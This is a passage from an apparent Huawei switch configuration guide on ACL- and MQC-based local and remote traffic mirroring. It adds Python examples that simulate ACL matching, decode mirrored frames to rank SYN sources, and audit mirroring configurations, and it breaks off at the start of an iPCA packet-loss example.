[Switch-acl-adv-3001] rule permit ip source 10.1.1.0 0.0.0.255 destination
10.1.2.0 0.0.0.255
[Switch-acl-adv-3001] quit

Step 3 Configure an ACL-based traffic policy.


# Configure an ACL-based traffic policy on GE1/0/1 of the Switch to mirror the matching
traffic.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-mirror inbound acl 3000 to observe-port
1 //Mirror the incoming packets that match ACL 3000 on GE1/0/1 to observing
port 1.
[Switch-GigabitEthernet1/0/1] traffic-mirror inbound acl 3001 to observe-port
1 //Mirror the incoming packets that match ACL 3001 on GE1/0/1 to observing
port 1.
[Switch-GigabitEthernet1/0/1] return

Step 4 Verify the configuration.


# Check ACL rules and traffic behavior information. The match counters read 0 immediately
after configuration; send test traffic from 10.1.1.0/24 through GE1/0/1 and run the command
again to confirm that the rules are actually hit.
<Switch> display traffic-applied interface gigabitethernet 1/0/1 inbound
-----------------------------------------------------------
ACL applied inbound interface GigabitEthernet1/0/1

ACL 3000
rule 5 permit tcp source 10.1.1.0 0.0.0.255 destination-port eq www (match-
counter 0)
ACTIONS:
mirror to observe-port 1
-----------------------------------------------------------

ACL 3001
rule 5 permit ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0.0.255 (match-
counter 0)
ACTIONS:
mirror to observe-port 1
-----------------------------------------------------------

# Check the observing port configuration.


<Switch> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface : GigabitEthernet1/0/2
----------------------------------------------------------------------


# Check the mirroring configuration.


<Switch> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2
----------------------------------------------------------------------
Stream-mirror:
----------------------------------------------------------------------
Behavior Direction Observe-port
----------------------------------------------------------------------
1 SACL - Observe-port 1
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
observe-port 1 interface GigabitEthernet1/0/2
#
acl number 3000
rule 5 permit tcp source 10.1.1.0 0.0.0.255 destination-port eq www
acl number 3001
rule 5 permit ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0.0.255
#
interface GigabitEthernet1/0/1
traffic-mirror inbound acl 3000 to observe-port 1
traffic-mirror inbound acl 3001 to observe-port 1
#
return
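This example and 18.3.7 rely on the same two ACLs, and what they do and do not copy is easy to misjudge: 0.0.0.255 is a wildcard mask rather than a subnet mask, eq www means destination port 80 only (HTTPS on 443 and DNS over UDP are not copied), and because the policy is applied inbound on GE1/0/1, the replies coming back from the Internet never match. The following Python simulator is an added example, not Huawei's code. It implements the ACL matching semantics the page's rules depend on (wildcard masks, first matching rule wins, permit selects a packet for copying) and runs constructed packets through a policy equivalent to the traffic-mirror statements on GE1/0/1. The port name "Uplink" for the Internet-facing interface is an assumption, as the page does not name it.

```python
"""Which packets does an ACL-selected mirroring policy actually copy?

Added example, not Huawei code. Models the ACL semantics used on this page
and evaluates constructed packets against the GE1/0/1 inbound policy.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple

WELL_KNOWN_PORTS = {"www": 80, "ftp": 21, "ssh": 22, "telnet": 23, "smtp": 25, "dns": 53}


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """Huawei ACL wildcard: bits set to 1 in the wildcard are ignored (0.0.0.255 == /24)."""
    care = (~int(ipaddress.IPv4Address(wildcard))) & 0xFFFFFFFF
    return ((int(ipaddress.IPv4Address(addr)) ^ int(ipaddress.IPv4Address(base))) & care) == 0


@dataclass
class Rule:
    action: str                              # "permit" or "deny"
    protocol: str                            # "ip" matches any IP protocol; "tcp"/"udp" are specific
    src: Optional[Tuple[str, str]] = None    # (base, wildcard)
    dst: Optional[Tuple[str, str]] = None
    dst_port: Optional[int] = None

    def matches(self, pkt: dict) -> bool:
        if self.protocol != "ip" and pkt["proto"] != self.protocol:
            return False
        if self.src and not wildcard_match(pkt["src"], *self.src):
            return False
        if self.dst and not wildcard_match(pkt["dst"], *self.dst):
            return False
        return self.dst_port is None or pkt.get("dport") == self.dst_port


def parse_rule(text: str) -> Rule:
    """Parse the subset of 'rule [id] permit|deny <proto> ...' syntax used on this page."""
    tok = text.split()
    if tok[0] == "rule":
        tok = tok[1:]
    if tok[0].isdigit():                     # optional rule id, as in 'rule 5 permit ...'
        tok = tok[1:]
    rule, rest, i = Rule(tok[0], tok[1]), tok[2:], 0
    while i < len(rest):
        if rest[i] == "source":
            rule.src, i = (rest[i + 1], rest[i + 2]), i + 3
        elif rest[i] == "destination":
            rule.dst, i = (rest[i + 1], rest[i + 2]), i + 3
        elif rest[i] == "destination-port" and rest[i + 1] == "eq":
            port = rest[i + 2]
            rule.dst_port, i = WELL_KNOWN_PORTS.get(port) or int(port), i + 3
        else:
            raise ValueError(f"unsupported keyword: {rest[i]}")
    return rule


# The two ACLs from the page, exactly as they appear in the configuration file.
ACL_3000 = [parse_rule("rule 5 permit tcp source 10.1.1.0 0.0.0.255 destination-port eq www")]
ACL_3001 = [parse_rule("rule 5 permit ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0.0.255")]

# traffic-mirror inbound acl 3000 / acl 3001 on GE1/0/1 (equivalent to classifier c1, operator or).
MIRROR_POLICY = {"GigabitEthernet1/0/1": [ACL_3000, ACL_3001]}


def acl_selects(rules, pkt) -> bool:
    """First matching rule decides: permit selects the packet for copying, deny or no match does
    not. Nothing here drops traffic; the packet is forwarded normally either way."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action == "permit"
    return False


def is_mirrored(pkt) -> bool:
    """True if the packet, entering on pkt['in_port'], is copied to the observing port."""
    return any(acl_selects(acl, pkt) for acl in MIRROR_POLICY.get(pkt["in_port"], []))


# Constructed packets. "Uplink" stands in for whichever port the Internet reply
# arrives on; the page does not name that port.
SAMPLE_PACKETS = [
    {"in_port": "GigabitEthernet1/0/1", "proto": "tcp", "src": "10.1.1.5", "dst": "203.0.113.10", "dport": 80},   # HTTP to Internet: copied (ACL 3000)
    {"in_port": "GigabitEthernet1/0/1", "proto": "tcp", "src": "10.1.1.5", "dst": "10.1.2.7", "dport": 22},       # SSH to admin dept: copied (ACL 3001)
    {"in_port": "GigabitEthernet1/0/1", "proto": "tcp", "src": "10.1.1.5", "dst": "203.0.113.10", "dport": 443},  # HTTPS: not copied, 'eq www' is port 80 only
    {"in_port": "GigabitEthernet1/0/1", "proto": "udp", "src": "10.1.1.5", "dst": "203.0.113.53", "dport": 53},   # DNS: not copied, ACL 3000 is tcp only
    {"in_port": "Uplink", "proto": "tcp", "src": "203.0.113.10", "dst": "10.1.1.5", "dport": 51000},             # Internet reply: not copied, policy is inbound on GE1/0/1
]

if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        verdict = "copied " if is_mirrored(pkt) else "ignored"
        print(verdict, pkt["in_port"], pkt["proto"], pkt["src"], "->", pkt["dst"], pkt.get("dport"))
```

If the monitoring goal is the whole conversation rather than one direction, the page's own MQC variant is the way to get it: apply a second policy, or an outbound one, on the port where the replies enter, since the ACL-based form is inbound only.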

Related Content
Support Community
l Mirroring – an Effective Network Monitoring Tool (Working Mechanism and Configuration)
l Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
l How to Configure Port Mirroring

18.3.9 Example for Configuring MQC-based Remote Traffic Mirroring

Remote Traffic Mirroring Overview


In remote traffic mirroring, service traffic matching configured rules is copied to an observing
port that is connected to a monitoring device through an intermediate network for analysis and
monitoring.

You can configure traffic mirroring using Modular QoS Command-Line Interface (MQC) or
ACL. MQC-based traffic mirroring takes more configuration but supports more matching rules
and can be applied in both the inbound and outbound directions. ACL-based traffic mirroring
is simpler to configure but supports fewer matching rules than MQC-based traffic mirroring and
can be applied only in the inbound direction.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.

Networking Requirements
As shown in Figure 18-16, external users on the Internet access the servers of a company
through SwitchA. The antivirus monitoring device Server connects to SwitchA through
SwitchB.
The company's official website has been taken down by a malicious attack. The Server
needs to analyze the traffic with TCP destination port WWW (80) remotely to locate the
attack source.
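What the antivirus monitoring Server receives is a copy of every frame the policy selects, tagged with the mirroring VLAN by the remote observing port; the tag survives to the Server only if its port on SwitchB is a trunk, while the access port used in 18.3.6 strips it. The following Python decoder is an added example, not Huawei's code or any product's capture tool. It parses tagged or untagged Ethernet/IPv4/TCP frames, ignores frames tagged with a VLAN other than the mirroring VLAN, and ranks sources by the number of SYNs sent to port 80, which is the first thing an analyst does with this feed when locating the source of an HTTP flood. The capture is constructed inline; the addresses and the flood pattern are assumptions.

```python
"""Decode mirrored frames on the monitoring Server and rank port-80 SYN sources.

Added example, not Huawei code. Frames are constructed here; on a real Server
they would come from a capture socket on the interface facing SwitchB.
"""
import ipaddress
import struct
from collections import Counter

ETH_P_8021Q = 0x8100
ETH_P_IP = 0x0800
TCP_SYN, TCP_ACK = 0x02, 0x10


def build_frame(src_ip, dst_ip, sport, dport, flags, vlan=None):
    """Constructed Ethernet/IPv4/TCP frame with no payload; checksums left at zero."""
    eth = bytes.fromhex("0200000000aa") + bytes.fromhex("0200000000bb")   # dst MAC, src MAC
    tag = struct.pack("!HH", ETH_P_8021Q, vlan & 0x0FFF) if vlan is not None else b""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src_ip).packed, ipaddress.IPv4Address(dst_ip).packed)
    return eth + tag + struct.pack("!H", ETH_P_IP) + ip + tcp


def parse_frame(frame):
    """Return {'vlan', 'src', 'dst', 'sport', 'dport', 'flags'} for an IPv4/TCP frame, else None."""
    off = 12
    (ethertype,) = struct.unpack_from("!H", frame, off)
    off += 2
    vlan = None
    if ethertype == ETH_P_8021Q:             # 802.1Q tag added by the remote observing port
        (tci,) = struct.unpack_from("!H", frame, off)
        vlan, off = tci & 0x0FFF, off + 2
        (ethertype,) = struct.unpack_from("!H", frame, off)
        off += 2
    if ethertype != ETH_P_IP:
        return None
    ver_ihl, _, _, _, _, _, proto, _, src, dst = struct.unpack_from("!BBHHHBBH4s4s", frame, off)
    if ver_ihl >> 4 != 4 or proto != 6:
        return None
    off += (ver_ihl & 0x0F) * 4               # skip IP options if any
    sport, dport, _, _, _, flags = struct.unpack_from("!HHIIBB", frame, off)
    return {"vlan": vlan, "src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
            "sport": sport, "dport": dport, "flags": flags}


def syn_sources(frames, port=80, expect_vlan=None):
    """Count connection attempts (SYN without ACK) to `port` per source address.
    With expect_vlan set, frames tagged with any other VLAN are not mirrored traffic
    and are counted as skipped; untagged frames (access-port delivery) are accepted."""
    counts, skipped = Counter(), 0
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt is None or pkt["dport"] != port:
            continue
        if expect_vlan is not None and pkt["vlan"] not in (None, expect_vlan):
            skipped += 1
            continue
        if pkt["flags"] & TCP_SYN and not pkt["flags"] & TCP_ACK:
            counts[pkt["src"]] += 1
    return counts, skipped


def top_source(frames, port=80, expect_vlan=10):
    """(address, SYN count) of the busiest source, or None if nothing matched."""
    counts, _ = syn_sources(frames, port, expect_vlan)
    return counts.most_common(1)[0] if counts else None


# Constructed capture (assumed addresses): one source hammering the web server with SYNs,
# a normal client, one of the server's SYN-ACK replies, and a stray frame from another VLAN.
WEB = "192.0.2.80"
CAPTURE = (
    [build_frame("198.51.100.7", WEB, 40000 + i, 80, TCP_SYN, vlan=10) for i in range(50)]
    + [build_frame("203.0.113.9", WEB, 52000 + i, 80, TCP_SYN, vlan=10) for i in range(3)]
    + [build_frame(WEB, "203.0.113.9", 80, 52000, TCP_SYN | TCP_ACK, vlan=10)]
    + [build_frame("10.9.9.9", WEB, 1234, 80, TCP_SYN, vlan=20)]
)

if __name__ == "__main__":
    counts, skipped = syn_sources(CAPTURE, 80, expect_vlan=10)
    print(counts.most_common(3), "skipped:", skipped)
```

A SYN count alone does not prove an attack, but a source that opens hundreds of connections per second to port 80 and never sends a request is the pattern the mirrored feed exists to expose; the next step is to block or rate-limit that source at SwitchA, which the mirror itself cannot do.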

Figure 18-16 Remote traffic mirroring networking
[Figure: external users on the Internet reach the data center (Server1, Server2, Server3)
through GE1/0/1 of SwitchA (mirrored port). GE1/0/2 of SwitchA (remote observing port)
connects over VLAN 10 to GE1/0/2 of SwitchB, and GE1/0/1 of SwitchB connects to the
antivirus monitoring Server. Legend: common port, mirrored port, remote observing port,
original packets, mirrored packets.]


Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/2 of SwitchA as a Layer 2 remote observing port to forward mirrored
packets to the specified VLAN.
2. Configure a traffic classifier on SwitchA to match traffic with TCP port number WWW,
and configure a traffic behavior to mirror packets to the observing port.
3. Configure a traffic policy on SwitchA, bind the traffic classifier and traffic behavior to
the traffic policy, and apply the traffic policy to GE1/0/1.
4. Create a VLAN on SwitchB, and add ports to the VLAN to forward the mirrored packets
sent from the observing port to the Server.

Procedure
Step 1 Configure an observing port on SwitchA.
# Configure GE1/0/2 of SwitchA as a Layer 2 remote observing port and bind the observing
port to VLAN 10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] observe-port 1 interface gigabitethernet 1/0/2 vlan 10 //Configure GE1/0/2 as Layer 2 remote observing port 1, and add it to VLAN 10.

After the configuration is complete, the observing port forwards mirrored packets to VLAN
10, so the observing port does not need to be added to the VLAN separately.
Step 2 Configure a traffic classifier on SwitchA.
# Create a traffic classifier c1 on SwitchA to match traffic with TCP port number WWW.
[SwitchA] acl number 3000 //Create ACL 3000 to allow the packets with the TCP port number WWW to pass through.
[SwitchA-acl-adv-3000] rule permit tcp destination-port eq www
[SwitchA-acl-adv-3000] quit
[SwitchA] traffic classifier c1 //Create a traffic classifier c1, and match ACL 3000.
[SwitchA-classifier-c1] if-match acl 3000
[SwitchA-classifier-c1] quit

Step 3 Configure a traffic behavior on SwitchA.


# Create a traffic behavior b1 on SwitchA, and define traffic mirroring in the traffic behavior
to copy specified traffic to observing port GE1/0/2.
[SwitchA] traffic behavior b1 //Create a traffic behavior b1, and define traffic mirroring to mirror specified traffic to observing port 1.
[SwitchA-behavior-b1] mirroring to observe-port 1
[SwitchA-behavior-b1] quit

Step 4 Configure a traffic policy on SwitchA to apply it to an interface.


# Create a traffic policy p1 on SwitchA, bind the traffic behavior and traffic classifier to the
traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1 to monitor
traffic with a specified TCP port number.
[SwitchA] traffic policy p1 //Create a traffic policy p1, and bind the traffic behavior and traffic classifier to the traffic policy.
[SwitchA-trafficpolicy-p1] classifier c1 behavior b1
[SwitchA-trafficpolicy-p1] quit
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] traffic-policy p1 inbound //Apply the traffic policy to the inbound direction of GE1/0/1.
[SwitchA-GigabitEthernet1/0/1] return

Step 5 Create a VLAN on SwitchB and add ports to the VLAN.


# Create VLAN 10 on SwitchB and add GE1/0/1 and GE1/0/2 to VLAN 10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 10
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type access //Set the link type of the interface on the monitoring device side to access. The default link type of interfaces is not access.
[SwitchB-GigabitEthernet1/0/1] port default vlan 10
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] port link-type trunk //Set the link type of the interface on the network side to trunk. The default link type of interfaces is not trunk.
[SwitchB-GigabitEthernet1/0/2] port trunk allow-pass vlan 10
[SwitchB-GigabitEthernet1/0/2] return

Step 6 Verify the configuration.


# Check the traffic classifier configuration.
<SwitchA> display traffic classifier user-defined c1
User Defined Classifier Information:
Classifier: c1
Precedence: 5
Operator: OR
Rule(s) : if-match acl 3000

# Check the traffic policy configuration.


<SwitchA> display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c1
Operator: OR
Behavior: b1
Permit
Mirroring to observe-port 1

# Check the observing port configuration.


<SwitchA> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface : GigabitEthernet1/0/2
Vlan : 10
----------------------------------------------------------------------

# Check the mirrored port configuration.


<SwitchA> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2
----------------------------------------------------------------------
Stream-mirror:
----------------------------------------------------------------------
Behavior Direction Observe-port
----------------------------------------------------------------------
1 b1 - Observe-port 1
----------------------------------------------------------------------

----End


Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
observe-port 1 interface GigabitEthernet1/0/2 vlan 10
#
acl number 3000
rule 5 permit tcp destination-port eq www
#
traffic classifier c1 operator or precedence 5
if-match acl 3000
#
traffic behavior b1
permit
mirroring to observe-port 1
#
traffic policy p1 match-order config
classifier c1 behavior b1
#
interface GigabitEthernet1/0/1
traffic-policy p1 inbound
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 10
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10
#
return

Related Content
Support Community
Mirroring – an Effective Network Monitoring Tool (Working Mechanism and
Configuration)
Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
How to Configure Port Mirroring

18.3.10 Example for Configuring ACL-based Remote Traffic Mirroring

Remote Traffic Mirroring Overview


In remote traffic mirroring, service traffic matching configured rules is copied to an observing
port that is connected to a monitoring device through an intermediate network for analysis and
monitoring.
You can configure traffic mirroring using Modular QoS Command-Line Interface (MQC) and
ACL. MQC-based traffic mirroring is complex to configure but supports more matching rules
and can be applied to both the inbound and outbound directions. ACL-based traffic mirroring
is easy to configure but supports fewer matching rules than MQC-based traffic mirroring and
can be applied to only the inbound direction.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.

Networking Requirements
As shown in Figure 18-17, external users on the Internet access the servers of a company
through SwitchA. The antivirus monitoring device Server connects to SwitchA through
SwitchB.
The official website of the company is paralyzed because of malicious attacks. The Server
needs to remotely analyze traffic with TCP port number WWW to locate the attack source.


Figure 18-17 Remote traffic mirroring networking
[Figure: external users on the Internet reach the data center (Server1, Server2, Server3)
through GE1/0/1 of SwitchA (mirrored port). GE1/0/2 of SwitchA (remote observing port)
connects over VLAN 10 to GE1/0/2 of SwitchB, and GE1/0/1 of SwitchB connects to the
antivirus monitoring Server. Legend: common port, mirrored port, remote observing port,
original packets, mirrored packets.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/2 of SwitchA as a Layer 2 remote observing port to forward mirrored
packets to the specified VLAN.
2. Configure an advanced ACL on SwitchA to match traffic with TCP port number WWW.
3. Configure an ACL-based traffic policy on GE1/0/1 of SwitchA to mirror the matching
traffic.
4. Create a VLAN on SwitchB, and add ports to the VLAN to forward the mirrored packets
sent from the observing port to the Server.

Procedure
Step 1 Configure an observing port on SwitchA.

# Configure GE1/0/2 of SwitchA as a Layer 2 remote observing port and bind the observing
port to VLAN 10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] observe-port 1 interface gigabitethernet 1/0/2 vlan 10 //Configure GE1/0/2 as Layer 2 remote observing port 1, and add it to VLAN 10.

After the configuration is complete, the observing port forwards mirrored packets to VLAN
10, so the observing port does not need to be added to the VLAN separately.


Step 2 Configure an advanced ACL on SwitchA.


# Create an advanced ACL numbered 3000 on SwitchA to match traffic with TCP port
number WWW.
[SwitchA] acl number 3000 //Create ACL 3000 to allow the packets with the TCP port number WWW to pass through.
[SwitchA-acl-adv-3000] rule permit tcp destination-port eq www
[SwitchA-acl-adv-3000] quit

Step 3 Configure an ACL-based traffic policy on SwitchA.


# Configure an ACL-based traffic policy on GE1/0/1 of SwitchA to mirror the matching
traffic.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] traffic-mirror inbound acl 3000 to observe-port 1 //Mirror incoming packets that match ACL 3000 on GE1/0/1 to observing port 1.
[SwitchA-GigabitEthernet1/0/1] return

Step 4 Create a VLAN on SwitchB and add ports to the VLAN.


# Create VLAN 10 on SwitchB and add GE1/0/1 and GE1/0/2 to VLAN 10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 10
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type access //Set the link type of the interface on the monitoring device side to access. The default link type of interfaces is not access.
[SwitchB-GigabitEthernet1/0/1] port default vlan 10
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] port link-type trunk //Set the link type of the interface on the network side to trunk. The default link type of interfaces is not trunk.
[SwitchB-GigabitEthernet1/0/2] port trunk allow-pass vlan 10
[SwitchB-GigabitEthernet1/0/2] return

Step 5 Verify the configuration.


# Check ACL rules and traffic behavior information.
<SwitchA> display traffic-applied interface gigabitethernet 1/0/1 inbound
-----------------------------------------------------------
ACL applied inbound interface GigabitEthernet1/0/1

ACL 3000
rule 5 permit tcp destination-port eq www (match-counter 0)
ACTIONS:
mirror to observe-port 1
-----------------------------------------------------------

# Check the observing port configuration.


<SwitchA> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface : GigabitEthernet1/0/2
Vlan : 10
----------------------------------------------------------------------

# Check the mirrored port configuration.


<SwitchA> display port-mirroring
----------------------------------------------------------------------


Observe-port 1 : GigabitEthernet1/0/2
----------------------------------------------------------------------
Stream-mirror:
----------------------------------------------------------------------
Behavior Direction Observe-port
----------------------------------------------------------------------
1 SACL - Observe-port 1
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
observe-port 1 interface GigabitEthernet1/0/2 vlan 10
#
acl number 3000
rule 5 permit tcp destination-port eq www
#
interface GigabitEthernet1/0/1
traffic-mirror inbound acl 3000 to observe-port 1
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 10
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10
#
return
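The Configuration Notes for both the MQC-based example above and this ACL-based one make two checks worth automating: an observing port must carry no other service configuration, and every mirroring action must point at an observe-port that is actually defined. The following script is an added example, not Huawei's code or a Huawei tool. It parses the plain-text configuration-file format shown in the Configuration Files sections (sections delimited by "#" lines), recognises both the MQC form ("mirroring to observe-port N" inside a traffic behavior) and the ACL form ("traffic-mirror inbound acl N to observe-port N" on an interface), and reports findings. CLEAN_CONFIG is the SwitchA configuration file from this example; FLAWED_CONFIG is constructed for illustration, with GigabitEthernet1/0/3, GigabitEthernet1/0/4, observe-port 2, observe-port 3 and VLAN 20 being invented values.

```python
"""Audit a VRP-style configuration file for remote traffic mirroring hygiene.

Added example, not Huawei's code. It checks the guide's Configuration Notes:
an observing port is dedicated to mirrored traffic, and each mirroring action
must target a defined observe-port (the ACL form is inbound-only).
"""
import re

OBSERVE_RE = re.compile(r"^observe-port (\d+) interface (\S+)(?: vlan (\d+))?")
IFACE_RE = re.compile(r"^interface (\S+)")
# MQC form: "mirroring to observe-port 1"; ACL form: "traffic-mirror inbound acl 3000 to observe-port 1"
MIRROR_RE = re.compile(r"^(?:mirroring|traffic-mirror\s+(\w+)\s+acl\s+\d+)\s+to observe-port (\d+)")

# SwitchA configuration file from the ACL-based example (18.3.10).
CLEAN_CONFIG = """\
#
sysname SwitchA
#
observe-port 1 interface GigabitEthernet1/0/2 vlan 10
#
acl number 3000
 rule 5 permit tcp destination-port eq www
#
interface GigabitEthernet1/0/1
 traffic-mirror inbound acl 3000 to observe-port 1
#
return
"""

# Constructed configuration with three defects: a service VLAN configured on the
# observing port, an unused observe-port 2, and a mirroring action that targets
# an observe-port 3 that is never defined.
FLAWED_CONFIG = """\
#
sysname SwitchA
#
observe-port 1 interface GigabitEthernet1/0/2 vlan 10
observe-port 2 interface GigabitEthernet1/0/3 vlan 10
#
acl number 3000
 rule 5 permit tcp destination-port eq www
#
traffic behavior b1
 permit
 mirroring to observe-port 1
#
interface GigabitEthernet1/0/2
 port link-type access
 port default vlan 20
#
interface GigabitEthernet1/0/4
 traffic-mirror inbound acl 3000 to observe-port 3
#
return
"""


def parse_sections(config):
    """Split a configuration into its '#'-delimited sections; each section is a list of stripped lines."""
    sections, current = [], []
    for raw in config.splitlines():
        line = raw.strip()
        if line == "#":
            if current:
                sections.append(current)
                current = []
        elif line and line != "return":
            current.append(line)
    if current:
        sections.append(current)
    return sections


def audit_mirroring(config):
    """Return a list of finding strings; an empty list means the mirroring setup is clean."""
    sections = parse_sections(config)
    observe_ports = {}   # observe-port index -> interface name
    interfaces = {}      # interface name -> commands configured under that interface
    referenced = set()   # observe-port indexes that some mirroring action targets
    findings = []

    # Pass 1: collect observe-port definitions and per-interface command lists.
    for section in sections:
        for line in section:
            m = OBSERVE_RE.match(line)
            if m:
                observe_ports[int(m.group(1))] = m.group(2)
        m = IFACE_RE.match(section[0])
        if m:
            interfaces[m.group(1)] = section[1:]

    # Pass 2: every mirroring action must target a defined observe-port; the
    # ACL-based form supports only the inbound direction.
    for section in sections:
        for line in section:
            m = MIRROR_RE.match(line)
            if not m:
                continue
            direction, idx = m.group(1), int(m.group(2))
            referenced.add(idx)
            if idx not in observe_ports:
                findings.append(f"ERROR: '{line}' targets undefined observe-port {idx}")
            if direction and direction != "inbound":
                findings.append(f"ERROR: ACL-based mirroring is inbound-only: '{line}'")

    # Pass 3: an observing port is dedicated to forwarding mirrored traffic.
    for idx, ifname in sorted(observe_ports.items()):
        extra = [c for c in interfaces.get(ifname, []) if not c.startswith("description")]
        if extra:
            findings.append(f"WARN: observing port {idx} ({ifname}) also carries {extra}")
        if idx not in referenced:
            findings.append(f"INFO: observe-port {idx} ({ifname}) has no mirroring action pointing at it")
    return findings


if __name__ == "__main__":
    for name, cfg in (("clean", CLEAN_CONFIG), ("flawed", FLAWED_CONFIG)):
        print(name, audit_mirroring(cfg) or "no findings")
```

The audit deliberately treats any command other than a description on an observing port's interface as a finding, which matches the note that the port should carry nothing but mirrored traffic. Bandwidth mismatch between mirrored and observing ports cannot be read from the configuration file, so that note still has to be checked against interface speeds.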

Related Content
Support Community
Mirroring – an Effective Network Monitoring Tool (Working Mechanism and
Configuration)
Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
How to Configure Port Mirroring


18.4 Typical iPCA Configuration

18.4.1 Example for Configuring iPCA to Implement End-to-End Packet Loss Measurement

iPCA Overview
Packet Conservation Algorithm for Internet (iPCA) technology is used to measure IP network
performance. It directly marks service packets to implement network-level and device-level
packet loss measurements.

In the all-IP era, various services sensitive to packet loss, such as voice and video services, are
transmitted through an IP network. To detect packet loss and find out packet loss points on the
network, Huawei developed iPCA technology. Huawei iPCA has the following
characteristics:

l iPCA applies to both Layer 2 and Layer 3 networks.
l iPCA directly marks service packets to obtain the packet loss ratio and number of lost
packets, without increasing loads on devices.
l iPCA supports packet loss statistics collection on multipoint-to-multipoint networks.

End-to-end packet loss measurement: Statistics are collected on edge devices that are part of
the transit network. This method is applicable to packet loss measurement for a specific
service flow, such as a voice flow or a video flow, on an enterprise network.

Configuration Notes
l A modular switch can support iPCA only after being equipped with an X1E card.
l The prerequisite for network-level packet loss measurement is time synchronization
among all devices. Therefore, before configuring iPCA on devices, configure the
Network Time Protocol (NTP) on the devices.
l In network-level packet loss measurement, target flows can be defined by users.
l In network-level packet loss measurement, the current version can only measure known
IP unicast packets but cannot measure unknown IP unicast packets. If unknown IP
unicast packets are measured, the measurement result may be inaccurate.
l Network-level packet loss measurement is based on target flows. If the packet content is
modified (for example, NAT is performed on packets, packets are encapsulated in
tunnels, and packet priority is changed), the device cannot precisely match the packets,
so the measurement result may be inaccurate.

Table 18-6 Applicable product models and versions

Product Model        Software Version
S12704               V200R008C00, V200R009C00
S12708 and S12712    V200R006C00, V200R007C00, V200R007C20, V200R008C00, and V200R009C00


Networking Requirements
As shown in Figure 18-18, users in enterprise branches and headquarters encounter erratic
display and delay when using the video conference service. The enterprise wants to obtain
packet loss statistics of the video conference service and receive an alarm when the packet
loss ratio exceeds 7% so that the network administrator can adjust service deployment in a
timely manner.

Figure 18-18 Networking diagram of end-to-end packet loss measurement
[Figure: a video terminal on 10.1.1.0/24 in the Branch connects to GE1/0/1 of Switch_1;
Switch_1 and Switch_2 are connected across the WAN; GE1/0/1 of Switch_2 connects to a video
terminal on 10.2.1.0/24 in the Headquarters. The forward flow runs from branch to
headquarters and the backward flow in the opposite direction.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure a service flow between video terminals as a target flow. It is a bidirectional
